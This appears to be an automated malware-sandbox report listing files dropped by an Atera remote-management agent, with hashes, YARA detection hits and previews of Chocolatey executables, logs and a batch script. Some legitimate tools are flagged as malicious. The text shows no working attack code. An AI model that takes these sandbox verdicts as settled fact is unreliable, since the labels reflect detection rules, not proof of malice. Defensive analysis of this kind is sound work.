                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`.......v....`.................................h...O.... ............... ..((...@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28903
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.251346989570315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Tmh6T6O6M6K6kQMhrVjymtdCDeq14cfgRaI0+ZPDF7q7JslG40rU/BL/L+4Q+7JU:aQLk9P74owZCtiGlqXzCtsnf5eofVCxj
                                                                                                                                                                                                                                                                                              MD5:31C01F03E1B4272ABCD557E20252D4C5
                                                                                                                                                                                                                                                                                              SHA1:730D0424AD1A9B712FA5F538E295A2BD0EFDF1E8
                                                                                                                                                                                                                                                                                              SHA-256:C37A51CCBE04188D68FB3F86E240492C04CF0BA966E4E30224680AE2A6B285A7
                                                                                                                                                                                                                                                                                              SHA-512:3AF51A66EBBA85976EEE7A6A8A8514F2140877B8AF48529309D4E9D5446015D765ADFB1433B38F4179D457C2A80AB5E05B68D2412E4FED9C775FCD1BF286C7F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:14,888 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,122 3248 [WARN ] - Enabled allowGlobalConfirmation..2025-01-06 06:59:15,200 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,388 3248 [WARN ] - 0 packages installed...2025-01-06 06:59:15,403 3248 [WARN ] - ..Did you know Pro / Business automatically syncs with Programs and.. Features? Learn more about Package Synchronizer at.. https://chocolatey.org/compare..2025-01-06 06:59:15,481 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,544 3248 [INFO ] - Outdated Packages.. Output is package name | current version | available version | pinned?....2025-01-06 06:59:15,685 3248 [WARN ] - ..Chocolatey has det

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18099
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.530728032151808
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dHQOhH0gyPFPzZhja2VRzdJa5dDp4RNk6P3C5CzzhdIlH4AHpdSgkIUeaeLe5e2j:P23C5Czzxnf5eofVCxm6C5CzzGqM
                                                                                                                                                                                                                                                                                              MD5:23E259A06131151355A5000F32AA87A6
                                                                                                                                                                                                                                                                                              SHA1:69EFA7D754BEDA8DB88BFF5886C491C12C71D58C
                                                                                                                                                                                                                                                                                              SHA-256:ADBD45E7F1DA3516BBECB852E7F50E3CB630F53C3243DB09533631754FBDCDF3
                                                                                                                                                                                                                                                                                              SHA-512:C9F1553FAAFAA8A1ACE948055B74D878CA3172A784659D6B652186A41B99BFF49697C80E4E9663D173615E6E0316843F41C73D5DCD3F0F28D56DFE4A415695E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 07:17:53,691 3248 [INFO ] - microsoft-edge 131.0.2903.112 [Approved]..2025-01-06 07:17:53,691 3248 [INFO ] - intel-dsa 24.6.49.8 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,706 3248 [INFO ] - ffmpeg 7.1.0 [Approved]..2025-01-06 07:17:53,706 3248 [INFO ] - webview2-runtime 131.0.2903.112 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,706 3248 [INFO ] - ffmpeg-full 7.1.0 [Approved] - Possibly broken..2025-01-06 07:17:53,706 3248 [INFO ] - OpenCV 4.10.0 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,722 3248 [INFO ] - ffmpeg-shared 7.1.0 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,722 3248 [INFO ] - microsoft-edge-insider 132.0.2957.26 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,738 3248 [INFO ] - WinSecurityBaseline 20.1803.0 [Approved]..2025-01-06 07:17:53,738 3248 [INFO ] - microsoft-edge-insider-dev 132.0.2957.11 [Approved] Downloads cached for licensed users..2

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\pcach.cch

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3904), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3904
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6141220025979965
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Lui8IbX5aU2BKJ4YyTl/HVLg+yfjSl/H0trAI8e6hmri:Si88X5aU2KATdHpg+ybSdH0FAe6hmri
                                                                                                                                                                                                                                                                                              MD5:E374F555FEF3882C09C0B0DA8C491B38
                                                                                                                                                                                                                                                                                              SHA1:19F6BC7EA5172B9AB911D573B5B132DCCD2719DE
                                                                                                                                                                                                                                                                                              SHA-256:E74E5D2F2A4955CAE5D5BE82F8AEE8FA2138D70CF500386C2FDF68CD999E22E8
                                                                                                                                                                                                                                                                                              SHA-512:4BF18BCCF893FA12848876F4963A6D0D353F4A9141DCDFD4DFBE7BE662D77D975C6B7EF2CC5A057FDDE133DBAE04AD74A6B551BEDBD63D80F7A862542B6995BD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:eyJJbnN0YWxsZWRBcHBzIjpbeyJSZW1vdmVhYmxlIjp0cnVlLCJOYW1lIjoiNy1aaXAgICh4NjQpIiwiVmVyc2lvbiI6IjIzLjAxIiwiSW5zdGFsbGVkT24iOiIyMDIzLTEwLTAzVDA2OjUxOjI4LjQ1NTM0NzMtMDQ6MDAiLCJQdWJsaXNoZXIiOiJJZ29yIFBhdmxvdiIsIlNpemVJbkJ5dGVzIjo1Nzg5Njk2LCJBdmFpbGFibGVWZXJzaW9uIjoiMjQuOS4wIiwiU3RhdHVzIjoiT3V0ZGF0ZWQiLCJUaGlyZFBhcnR5TmFtZSI6Ijd6aXAuaW5zdGFsbCJ9LHsiUmVtb3ZlYWJsZSI6dHJ1ZSwiTmFtZSI6IkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkiLCJWZXJzaW9uIjoiMjMuMDA2LjIwMzIwIiwiSW5zdGFsbGVkT24iOiIyMDIzLTEwLTAzVDAwOjAwOjAwIiwiUHVibGlzaGVyIjoiQWRvYmUiLCJTaXplSW5CeXRlcyI6NjI2NzQ1MzQ0LCJBdmFpbGFibGVWZXJzaW9uIjpudWxsLCJTdGF0dXMiOiJJbnN0YWxsZWQiLCJUaGlyZFBhcnR5TmFtZSI6bnVsbH0seyJSZW1vdmVhYmxlIjpmYWxzZSwiTmFtZSI6IkF0ZXJhQWdlbnQiLCJWZXJzaW9uIjoiMS44LjcuMiIsIkluc3RhbGxlZE9uIjoiMjAyNC0wMi0yOFQxMDo1MjowNC0wNTowMCIsIlB1Ymxpc2hlciI6IkF0ZXJhIG5ldHdvcmtzIiwiU2l6ZUluQnl0ZXMiOjQ5MjAwNDgsIkF2YWlsYWJsZVZlcnNpb24iOm51bGwsIlN0YXR1cyI6Ikluc3RhbGxlZCIsIlRoaXJkUGFydHlOYW1lIjpudWxsfSx7IlJlbW92ZWFibGUiOmZhbHNlLCJOYW1lIjoiR29vZ2xlIENocm9tZSIsIlZlcnNp

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\RefreshEnv.cmd

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2340
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.120693108028518
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:WJhzy3v9zec4JksG5A10JZ65RhS9JlqUp7B9nplD6e7B5yg:42V6Q5A1B5C9L/
                                                                                                                                                                                                                                                                                              MD5:B4326546C3A252494DCD512976F8B89A
                                                                                                                                                                                                                                                                                              SHA1:09D10EA0ABDBDE8C2B5BAFE410ED3B96AB0076C8
                                                                                                                                                                                                                                                                                              SHA-256:9B251737A6B6ACE9FDE45B64FD653B04575C6416F15112FBE1697A47B14990E6
                                                                                                                                                                                                                                                                                              SHA-512:E58EDC6DC66A289358E7FDE7C3F1D73A0EE1F7A6DB382DD1318FAA205E12271C081617B8366ECD1FCB3A0BC5A98F4B0F0C389C99A63D9EDF7CE1BD230AC85EC2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:@echo off..::..:: RefreshEnv.cmd..::..:: Batch file to read environment variables from registry and..:: set session variables to these values...::..:: With this batch file, there should be no need to reload command..:: environment every time you want environment changes to propagate....::echo "RefreshEnv.cmd only works from cmd.exe, please install the Chocolatey Profile to take advantage of refreshenv from PowerShell"..echo | set /p dummy="Refreshing environment variables from registry for cmd.exe. Please wait..."....goto main....:: Set one environment variable from registry key..:SetFromReg.. "%WinDir%\System32\Reg" QUERY "%~1" /v "%~2" > "%TEMP%\_envset.tmp" 2>NUL.. for /f "usebackq skip=2 tokens=2,*" %%A IN ("%TEMP%\_envset.tmp") do (.. echo/set "%~3=%%B".. ).. goto :EOF....:: Get a list of environment variables from registry..:GetRegEnv.. "%WinDir%\System32\Reg" QUERY "%~1" > "%TEMP%\_envget.tmp".. for /f "usebackq skip=2" %%A IN ("%TEMP%\_envget.tmp") do (

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):136704
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174853806484254
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:ED98HpKI6GCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:Y9GpKbShcHUa
                                                                                                                                                                                                                                                                                              MD5:DDD072DBD2267BCB3081340E57ED092B
                                                                                                                                                                                                                                                                                              SHA1:04EC398A1DE53DC960A882363A528E162350C57C
                                                                                                                                                                                                                                                                                              SHA-256:460F604144DD93A3794F75C9E09B2676D7AD1295CD92499FAD80ED3C27990F02
                                                                                                                                                                                                                                                                                              SHA-512:2271C5846254EAA7389D23EE0241814D06D34257A7B6D44FE7CBEA14F3ACA5101457FAD934B22D2B9B49F1263BCB4209D8EADC07DB93E2B5E01CCDA5BD6ED2A8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)$/b.................D...........c... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....C... ...D.................. ..`.rsrc...X............F..............@..@.reloc.......`......................@..B.................c......H....... ...x5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162895637606263
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:KMU90HpKOrGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:K59OpKgShcHUa
                                                                                                                                                                                                                                                                                              MD5:0BCC21AC34291B167EC4D73079EAE085
                                                                                                                                                                                                                                                                                              SHA1:BAEF2A7349E2C6269BBF2C8C6654C492683FC73E
                                                                                                                                                                                                                                                                                              SHA-256:14288199533B10CAD97F5917447979BBC4685F20255AA073EC1BB828D3CF6A2C
                                                                                                                                                                                                                                                                                              SHA-512:9B7CC423E4F27DFF6006425311A6CC39CBA9CB5D3D4966C81FDA21C5907A434B6A748A92B65229A01A65440D8BA2D87D9E8C99CE80E2062569232A10AE74F9BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*$/b.................F...........c... ........@.. ....................................@..................................c..W.......p....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...p............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162623164553414
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:1w9mHpKZNGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:C9UpK7ShcHUa
                                                                                                                                                                                                                                                                                              MD5:55CC3EA23C5430BE7B5A75A52157DA18
                                                                                                                                                                                                                                                                                              SHA1:AB1D482F2B5E7E0DAD31EA18B78D5F8EA849B87D
                                                                                                                                                                                                                                                                                              SHA-256:BE0494DC91E38456E22692F3AB1891C56871FB82A83ADFDC58F8F890141ECEC9
                                                                                                                                                                                                                                                                                              SHA-512:C09E0476E2D1F69A878195A4026954C5D74C0B5318254A60ABC5909F00A60CCE86D49D29BBF1ECAE498BCE0C2FD2551EFEF0FE287DAB7EAD2FE573CCC833CF3E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+$/b.................F...........d... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162059784215363
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:YE9tHpKrvGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:795pK7ShcHUa
                                                                                                                                                                                                                                                                                              MD5:4E2DC776C653ADBEBCF5DB16AB53296E
                                                                                                                                                                                                                                                                                              SHA1:290457CFC7EC45A493CCEACD2CA24A47237494C1
                                                                                                                                                                                                                                                                                              SHA-256:2DCB2236BB84AE42F4395E72EC67A22CBE0E68ADA4F80FABD7141B5B3D4E7985
                                                                                                                                                                                                                                                                                              SHA-512:533B424AFD7E5BF831BB72164D91B663A2368D458A3EFFFF7062A15D1AB77585C087FA5A5471D3530CCF30309AC30C35EAA4A9168A350071A64E912E15012311
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162082250130723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:GI9KHpKHDGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:l9QpKjShcHUa
                                                                                                                                                                                                                                                                                              MD5:76385C4CF0842546103EDD75662BDAD7
                                                                                                                                                                                                                                                                                              SHA1:BC42B5817E6BB3568CC6D7C0BD2B03E8B723024B
                                                                                                                                                                                                                                                                                              SHA-256:67EB4084D0BD361C42FFD7AF025167BAFCE8496A35CA6616945E0942386C6424
                                                                                                                                                                                                                                                                                              SHA-512:BAB9B5AE9B89697A7FA83D0D29A4DB0B777F126EEC8DF3BAE9B009AF9A0D556BB79BF2DCED1D26C7A8E900AC5AA7DDE07CEC334DA6418925F352554383F77EC2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
